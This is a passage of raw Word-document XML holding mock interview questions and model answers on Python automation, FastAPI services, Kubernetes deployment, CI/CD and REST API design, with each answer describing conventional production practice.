    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would first define the exact operational workflow and failure modes. Then I would design the script with configuration through environment variables or a config file, argument parsing with argparse or Typer, structured logging, input validation, and a dry-run option. For Kubernetes I would use the Kubernetes Python client or call kubectl only when that is the team standard. For cloud operations I would use the official SDK. I would make the script idempotent, add retries with backoff for transient failures, return meaningful exit codes, and run it in CI, CronJob, Cloud Run job, or a controlled automation runner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you handle errors, retries, logging, and exit codes in production Python automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I handle expected errors explicitly and fail fast on unsafe conditions. For transient errors such as API rate limits, network timeouts, or temporary 5xx responses, I use retries with exponential backoff and a maximum retry limit. Logs should be structured and include operation name, resource name, environment, correlation ID if available, and final status. Exit code 0 means success, non-zero means failure, and different exit codes can represent validation failure, authentication failure, or partial execution. For production automation, silent failure is dangerous, so failed runs should alert or create a visible ticket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. When would you choose Python over Bash for automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I choose Bash for simple command orchestration, such as running a few shell commands in sequence. I choose Python when the automation needs API calls, JSON parsing, data transformation, complex conditionals, tests, reusable modules, better error handling, or long-term maintainability. For example, a five-line deployment helper can be Bash, but a tool that checks Kubernetes resources, queries cloud APIs, builds a report, and applies conditional remediation should be Python.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you securely handle credentials and secrets in a Python automation script?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would avoid hardcoding secrets or passing them through command history. In cloud environments, I prefer workload identity, service accounts, managed identities, or short-lived credentials. If the script needs a secret, it should read it from Secret Manager, Vault, AWS Secrets Manager, Azure Key Vault, or the platform-approved secret store. I would avoid logging secret values, mask sensitive fields, restrict IAM permissions to least privilege, and rotate credentials. For local development, I would use environment variables or a local credentials flow, but never commit secrets to Git.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you make Python automation idempotent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Idempotency means running the automation multiple times should produce the same final state without causing duplicate or unsafe changes. I do this by checking current state before making changes, comparing desired state versus actual state, using stable resource names, avoiding blind create operations, and making updates conditional. For example, before creating a Kubernetes namespace or IAM binding, the script should check whether it already exists. I also add dry-run output so reviewers can see what would change before execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you schedule and run Python automation in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: It depends on the use case. For scheduled operational jobs, I can run Python as a Kubernetes CronJob, Cloud Scheduler plus Cloud Run job, GitHub Actions, Jenkins scheduled job, Airflow DAG, or a VM cron if the environment is simpler. For production, I care about identity, logs, retries, timeout, concurrency control, alerting, and auditability. I would also prevent overlapping runs if the automation changes shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you package and deploy a Python automation tool for a team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would package it as a proper Python project with pyproject.toml, reusable modules, a CLI entry point, pinned dependencies, tests, linting, and versioning. For execution, I might publish it as an internal package, build a Docker image, or run it as a CI/CD job. The team should get a clear command interface, examples, dry-run mode, and documentation. For sensitive automation, I would add approval gates and least-privilege runtime identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is FastAPI and why would you choose it for backend APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: FastAPI is a modern Python web framework for building APIs. I would choose it because it is fast, developer-friendly, supports async, uses Pydantic for validation, generates OpenAPI documentation automatically, and integrates well with testing, authentication, containers, and cloud deployment. For DevOps or platform teams, FastAPI is useful for internal developer portals, automation APIs, webhook receivers, deployment tools, and service integrations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you create a basic GET and POST API in FastAPI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In FastAPI, we create an app object and define route functions with decorators like @app.get and @app.post. A GET endpoint is usually used to read data, and a POST endpoint is used to create or trigger something. For request bodies, I use Pydantic models so FastAPI validates input automatically. In production, I also add proper response models, status codes, error handling, authentication, logging, and tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How does request validation work in FastAPI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: FastAPI uses type hints and Pydantic models to validate request path parameters, query parameters, headers, and JSON bodies. If a request does not match the expected schema, FastAPI returns a validation error before the business logic runs. This is useful because invalid input is rejected consistently. For production APIs, I define strict models, avoid accepting arbitrary fields unless needed, validate ranges and formats, and keep request and response models explicit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you implement authentication and authorization in a FastAPI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For authentication, I would normally use OAuth2, JWT, API keys, or an identity provider depending on the environment. In FastAPI, dependencies are a clean way to validate tokens or API keys before the endpoint runs. Authorization is separate: after identifying the caller, I check roles, scopes, groups, tenant, or resource-level permissions. For internal services, I may also use mTLS or identity-aware proxy at the platform layer. I would log authentication failures carefully without exposing tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How does a FastAPI application read and write data to a database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A FastAPI app usually uses a database library or ORM such as SQLAlchemy, SQLModel, asyncpg, psycopg, or a cloud-specific client. The endpoint receives and validates the request, calls a service layer, performs database operations through a session or connection pool, commits changes, and returns a response model. In production, I separate route logic from business logic, use migrations such as Alembic or Liquibase, configure connection pooling, handle transaction rollback, and avoid leaking database errors to clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What is the difference between sync and async endpoints in FastAPI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Async</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A sync endpoint uses normal def and blocks the worker while it runs. An async endpoint uses async def and can release control while waiting for non-blocking I/O, such as async database calls or HTTP calls. Async helps when the application has many I/O-bound operations, but it only works well if the libraries are also async. For CPU-heavy work, async is not the solution; I would use background workers, queues, multiprocessing, or separate services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How would you test a FastAPI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would write unit tests for business logic and API tests using FastAPI TestClient or httpx. Tests should cover successful requests, validation failures, authentication failures, authorization checks, database behavior, and error responses. For database tests, I can use a test database, transaction rollback, or containers. In CI, I would run formatting, linting, type checks where useful, unit tests, integration tests, and security/dependency scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How would you containerize and run a FastAPI application using Docker?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would create a Dockerfile that starts from a slim Python base image, installs dependencies, copies application code, uses a non-root user where possible, exposes the service port, and starts the app with uvicorn or gunicorn with uvicorn workers. I would pin dependencies, keep the image small, avoid copying secrets, and add health checks at the platform level. Locally I would run it with docker run -p 8000:8000, and in CI I would tag the image with the commit SHA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How would you deploy a FastAPI application on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would build and push the Docker image to a registry, then deploy it using a Kubernetes Deployment, Service, ConfigMap, Secret, and optionally Ingress. The Deployment should define requests and limits, readiness and liveness probes, environment variables, security context, and image tag. The Service exposes the Pods internally, and Ingress or a load balancer exposes it externally if required. I would use rolling deployment or canary, monitor error rate and latency, and keep rollback simple through image versioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How would you add logging, metrics, and tracing to a FastAPI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For logging, I would use structured JSON logs with fields like timestamp, level, service, route, status code, latency, request ID, and trace ID. For metrics, I would expose Prometheus metrics or use OpenTelemetry metrics for request count, latency, errors, and dependency calls. For tracing, I would instrument FastAPI with OpenTelemetry and export traces to Jaeger, Tempo, Cloud Trace, Datadog, or another backend. The key is correlation: logs, metrics, and traces should connect through request ID or trace ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. What security best practices would you follow for FastAPI APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would enforce authentication and authorization, validate all inputs, use HTTPS, configure CORS carefully, avoid exposing stack traces, sanitize logs, protect secrets, use dependency scanning, add rate limiting where needed, and follow least privilege for database and cloud access. I would also add security headers at the gateway or app layer, keep dependencies updated, use non-root containers, scan images, and log security-relevant events without leaking sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How would you improve performance and scalability for a FastAPI service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would first measure latency, throughput, error rate, CPU, memory, and database performance. Then I would tune the worker count, use async only where it helps, add connection pooling, cache expensive reads, optimize database queries, move long-running work to background queues, and scale horizontally on Kubernetes with HPA. I would also run load tests with tools like k6, Locust, or JMeter and define scaling based on real bottlenecks, not guesswork.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. How would you design a CI/CD pipeline for a Python FastAPI service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The pipeline should start from a pull request. It runs formatting, linting, tests, dependency scanning, secret scanning, and optionally type checks. After merge, it builds a Docker image, scans the image, pushes it to the registry, and deploys to a lower environment. Production deployment should use approvals, immutable image tags, rollout health checks, monitoring validation, and rollback. For Kubernetes, the deployment can be done with Helm, Kustomize, ArgoCD, Jenkins, GitHub Actions, Cloud Build, or another approved tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. A FastAPI service is returning intermittent 500 errors in Kubernetes. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would start with impact and timeline: when did errors start, which routes are affected, and whether it aligns with a deployment or traffic spike. Then I would check application logs with request IDs, Kubernetes events, Pod restarts, readiness failures, resource throttling, memory OOM kills, database connection errors, dependency timeouts, and ingress/load balancer metrics. I would compare failing and healthy Pods, check recent config or secret changes, inspect traces if available, and mitigate quickly by rollback, scaling, or disabling a bad dependency path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Design a production-ready FastAPI service for an internal DevOps automation platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/FastAPI/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would design it as a small platform API with clear endpoints for approved automation tasks, backed by authentication, authorization, audit logs, and approval controls for risky operations. The service would run on Kubernetes with a Deployment, Service, Ingress, ConfigMaps, Secrets, probes, resource limits, HPA, and structured logging. It would use a database for request history and job state, a queue or background worker for long-running automation, and least-privilege cloud or Kubernetes identities. CI/CD would run tests and scans, build an immutable image, deploy progressively, and validate metrics. Observability would include request latency, error rate, job success rate, audit events, and traces for external API calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 75 - API Development Production Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is an API and why do we use APIs in modern applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An API, or Application Programming Interface, is a contract that allows one software system to interact with another. In modern applications, APIs separate frontend, backend, mobile apps, automation tools, and third-party integrations. A good API hides internal implementation details and exposes controlled operations with clear request and response formats, authentication, authorization, validation, error handling, and documentation. In production, APIs also need observability, versioning, rate limiting, and security controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is the difference between REST API, GraphQL, and gRPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: REST is resource-oriented and commonly uses HTTP methods like GET, POST, PUT, PATCH, and DELETE with JSON responses. It is simple and widely used. GraphQL lets clients request exactly the fields they need through a schema, which can reduce over-fetching but adds complexity around authorization, caching, and query cost control. gRPC uses Protocol Buffers and HTTP/2, making it efficient for service-to-service communication, streaming, and strongly typed contracts. For public or general web APIs I often choose REST; for flexible frontend data fetching GraphQL can help; for internal high-performance microservice calls gRPC is strong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design REST endpoints for a user or order management service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/REST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would model endpoints around resources and keep naming consistent. For example, GET /users lists users, POST /users creates a user, GET /users/{id} fetches one user, PATCH /users/{id} partially updates a user, and DELETE /users/{id} deletes or deactivates a user. For orders, I might use GET /orders, POST /orders, GET /orders/{id}, and GET /users/{id}/orders if the relationship matters. I would define request and response schemas, status codes, validation rules, pagination, filtering, authorization, and error response format before implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What are common HTTP methods and when would you use GET, POST, PUT, PATCH, and DELETE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GET is used to read data and should not change server state. POST is used to create a resource or trigger an operation. PUT usually replaces an entire resource and should be idempotent. PATCH updates part of a resource. DELETE removes or deactivates a resource. In senior API design, the method should match the behavior because clients, caches, gateways, and monitoring tools rely on HTTP semantics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
